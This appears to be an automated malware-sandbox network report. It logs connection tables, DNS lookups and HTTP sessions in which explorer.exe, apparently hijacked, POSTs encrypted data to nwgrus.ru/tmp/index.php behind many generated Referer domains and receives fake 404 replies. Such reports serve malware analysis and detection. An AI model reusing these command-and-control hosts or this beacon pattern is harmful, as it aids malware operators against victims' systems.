                                                                Oct 12, 2024 23:29:51.698127985 CEST8050041190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:29:51.698179007 CEST8050041190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:29:53.060389996 CEST8050041190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:29:53.061034918 CEST8050041190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:29:53.061101913 CEST5004180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:29:53.061158895 CEST5004180192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:29:53.066035986 CEST8050041190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:01.775891066 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:01.781328917 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:01.781446934 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:01.781599045 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:01.781599045 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:01.786515951 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:01.787307978 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:03.156392097 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:03.157452106 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:03.157572031 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:03.157671928 CEST5004280192.168.2.4190.224.203.37
                                                                Oct 12, 2024 23:30:03.162503004 CEST8050042190.224.203.37192.168.2.4
                                                                Oct 12, 2024 23:30:18.602315903 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:18.608784914 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:18.608882904 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:18.609090090 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:18.609113932 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:18.614312887 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:18.614360094 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:20.228813887 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:20.228833914 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:20.228848934 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:20.229015112 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:20.229079962 CEST5709380192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:20.233907938 CEST8057093190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:31.673687935 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:32.180552959 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:32.180668116 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:32.180901051 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:32.180929899 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:32.185765028 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:32.185785055 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:33.635618925 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:33.636921883 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:33.637007952 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:33.637053013 CEST5709480192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:33.641828060 CEST8057094190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:45.457108021 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:45.462207079 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:45.462294102 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:45.462446928 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:45.462476015 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:45.467231989 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:45.467376947 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:46.931045055 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:46.931988955 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:46.932059050 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:46.932145119 CEST5709580192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:46.937087059 CEST8057095190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:59.553873062 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:59.558706045 CEST8057096190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:59.558794022 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:59.558944941 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:59.558969975 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:30:59.563759089 CEST8057096190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:30:59.563775063 CEST8057096190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:31:01.015340090 CEST8057096190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:31:01.016155958 CEST8057096190.220.21.28192.168.2.4
                                                                Oct 12, 2024 23:31:01.016369104 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:31:01.016369104 CEST5709680192.168.2.4190.220.21.28
                                                                Oct 12, 2024 23:31:01.021357059 CEST8057096190.220.21.28192.168.2.4
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 12, 2024 23:27:32.688499928 CEST5810553192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:27:33.676529884 CEST5810553192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:27:34.708372116 CEST5810553192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:27:34.806319952 CEST53581051.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:27:34.806361914 CEST53581051.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:27:34.806395054 CEST53581051.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:28:36.184603930 CEST6129953192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:28:36.215353966 CEST53612991.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:28:36.222857952 CEST6076853192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:28:36.252749920 CEST53607681.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:29:44.950092077 CEST5513253192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:29:44.960016966 CEST53551321.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:29:44.970916033 CEST5264753192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:29:44.980370045 CEST53526471.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:29:51.651804924 CEST6365253192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:29:51.683798075 CEST53636521.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:29:51.698602915 CEST5642853192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:29:51.708811045 CEST53564281.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:00.748212099 CEST5374153192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:00.779786110 CEST53537411.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:00.788609982 CEST6287853192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:00.819287062 CEST53628781.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:11.593833923 CEST5215453192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:11.604468107 CEST53521541.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:11.606856108 CEST5341053192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:11.616049051 CEST53534101.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:14.391885996 CEST5595453192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:15.385664940 CEST5595453192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:15.736234903 CEST53559541.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:18.117928028 CEST53559541.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:23.232620955 CEST5590053192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:23.241581917 CEST53559001.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:23.252279043 CEST5095153192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:23.283108950 CEST53509511.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:34.874161005 CEST5758753192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:35.736176014 CEST53575871.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:35.744683981 CEST6022053192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:35.753649950 CEST53602201.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:47.371689081 CEST6083553192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:47.381467104 CEST53608351.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:30:47.392729998 CEST4946153192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:30:47.423365116 CEST53494611.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:31:00.445220947 CEST6467453192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:31:00.475912094 CEST53646741.1.1.1192.168.2.4
                                                                Oct 12, 2024 23:31:00.491930962 CEST6317553192.168.2.41.1.1.1
                                                                Oct 12, 2024 23:31:00.501893044 CEST53631751.1.1.1192.168.2.4
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Oct 12, 2024 23:27:32.688499928 CEST192.168.2.41.1.1.10x4f62Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:33.676529884 CEST192.168.2.41.1.1.10x4f62Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.708372116 CEST192.168.2.41.1.1.10x4f62Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:28:36.184603930 CEST192.168.2.41.1.1.10x74fcStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:28:36.222857952 CEST192.168.2.41.1.1.10x57bdStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:44.950092077 CEST192.168.2.41.1.1.10x2a16Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:44.970916033 CEST192.168.2.41.1.1.10x805aStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:51.651804924 CEST192.168.2.41.1.1.10x92f8Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:51.698602915 CEST192.168.2.41.1.1.10xe8ffStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:00.748212099 CEST192.168.2.41.1.1.10x2121Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:00.788609982 CEST192.168.2.41.1.1.10x4e8eStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:11.593833923 CEST192.168.2.41.1.1.10xb18cStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:11.606856108 CEST192.168.2.41.1.1.10x2a6Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:14.391885996 CEST192.168.2.41.1.1.10xd3adStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:15.385664940 CEST192.168.2.41.1.1.10xd3adStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:23.232620955 CEST192.168.2.41.1.1.10xbb5dStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:23.252279043 CEST192.168.2.41.1.1.10xb383Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:34.874161005 CEST192.168.2.41.1.1.10xf969Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:35.744683981 CEST192.168.2.41.1.1.10x7447Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:47.371689081 CEST192.168.2.41.1.1.10xde56Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:47.392729998 CEST192.168.2.41.1.1.10x93f7Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:31:00.445220947 CEST192.168.2.41.1.1.10xb5ecStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:31:00.491930962 CEST192.168.2.41.1.1.10x7932Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806319952 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806361914 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru211.202.224.10A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru109.98.58.98A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru148.230.249.9A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:27:34.806395054 CEST1.1.1.1192.168.2.40x4f62No error (0)nwgrus.ru181.123.219.23A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:28:36.215353966 CEST1.1.1.1192.168.2.40x74fcName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:28:36.252749920 CEST1.1.1.1192.168.2.40x57bdName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:44.960016966 CEST1.1.1.1192.168.2.40x2a16Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:44.980370045 CEST1.1.1.1192.168.2.40x805aName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:51.683798075 CEST1.1.1.1192.168.2.40x92f8Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:29:51.708811045 CEST1.1.1.1192.168.2.40xe8ffName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:00.779786110 CEST1.1.1.1192.168.2.40x2121Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:00.819287062 CEST1.1.1.1192.168.2.40x4e8eName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:11.604468107 CEST1.1.1.1192.168.2.40xb18cName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:11.616049051 CEST1.1.1.1192.168.2.40x2a6Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru211.181.24.133A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru187.199.203.72A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru185.12.79.25A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru187.204.42.174A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru78.89.199.216A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:18.117928028 CEST1.1.1.1192.168.2.40xd3adNo error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:23.241581917 CEST1.1.1.1192.168.2.40xbb5dName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:23.283108950 CEST1.1.1.1192.168.2.40xb383Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:35.736176014 CEST1.1.1.1192.168.2.40xf969Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:35.753649950 CEST1.1.1.1192.168.2.40x7447Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:47.381467104 CEST1.1.1.1192.168.2.40xde56Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:30:47.423365116 CEST1.1.1.1192.168.2.40x93f7Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:31:00.475912094 CEST1.1.1.1192.168.2.40xb5ecName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                                Oct 12, 2024 23:31:00.501893044 CEST1.1.1.1192.168.2.40x7932Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                                • 23.145.40.164
                                                                • ddmlqgiwokgjnrjp.com
                                                                  • nwgrus.ru
                                                                • akwopxbyfda.org
                                                                • hdugujrhcjt.org
                                                                • yqqseuuafdwk.org
                                                                • pkgsugfsxnjdsjfs.com
                                                                • rwtmirjlqyc.net
                                                                • qgmuajpjvyrttvq.org
                                                                • pxoxujlnkixexhr.net
                                                                • kklpocdpdsv.net
                                                                • mubqagferfk.net
                                                                • imnnydowlgvnht.net
                                                                • jodccroecnfoy.com
                                                                • nsmlwxtdmapgbt.net
                                                                • mgjceopkpxepxsq.net
                                                                • oftgcfgbliielxad.org
                                                                • drvjksfgomsvmny.net
                                                                • ecoqiraysyfcwnbl.com
                                                                • evxjlpqlxbs.org
                                                                • icaimrqjtfta.com
                                                                • ulydvxuenfbpuxu.com
                                                                • gvahueqnuehjgw.net
                                                                • tfjoxhiuawit.com
                                                                • fveqebbshittyfl.net
                                                                • ymhiquwyrvgqovol.org
                                                                • ydoywfwjttlrcvfk.net
                                                                • yjtrvkrlityi.net
                                                                • mjjimnkvahrtrhwm.net
                                                                • gppslndiqwv.net
                                                                • gbbsahanxxry.org
                                                                • qvmvwcqodtkhh.net
                                                                • wvcoypmusqw.com
                                                                • drxslflnmsuof.net
                                                                • juflamsakvad.org
                                                                • omekhnsmgqeu.net
                                                                • nkkmigjawaaknrre.org
                                                                • ewehlvglopwca.org
                                                                • gnpoohklywxdvf.com
                                                                • yaiqkdhqwmycp.org
                                                                • yrsmvamryedsmns.org
                                                                • vdkygqlrtijypkc.org
                                                                • blhloseiscjcafeh.com
                                                                • ficvdttvkapihqjd.org
                                                                • rydhygdypun.net
                                                                • tasohhqhxavd.org
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449736190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:34.823142052 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://ddmlqgiwokgjnrjp.com/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 251
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:34.826426983 CEST251OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 07 a1 92
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA .[k,vu4VB]tJ$?P%K:1qJGrz6CbO,&YLdPTrZ, (WkQo/Cbm[>M"A/T
                                                                Oct 12, 2024 23:27:36.503072023 CEST152INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:36 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 04 00 00 00 72 e8 87 e8
                                                                Data Ascii: r


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449737190.224.203.37802580C:\Windows\explorer.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 12, 2024 23:27:36.518877029 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Accept: */*
                                                                Referer: http://akwopxbyfda.org/
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                Content-Length: 131
                                                                Host: nwgrus.ru
                                                                Oct 12, 2024 23:27:36.518918991 CEST131OUTData Raw: 3b 6e 52 62 86 c8 1e 22 df ae b4 0b 06 09 7b cc 77 0a bd 90 6d 01 92 67 0b 7d 08 e0 46 c3 c5 6c ee 2d b2 58 0e 1d 23 1d 9a ee 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 4b 0f a5 e4
                                                                Data Ascii: ;nRb"{wmg}Fl-X#? 9Yt M@NA -[k,vuKH*rhvf]#Ll7EH=#
                                                                Oct 12, 2024 23:27:37.896641970 CEST484INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.26.0
                                                                Date: Sat, 12 Oct 2024 21:27:37 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


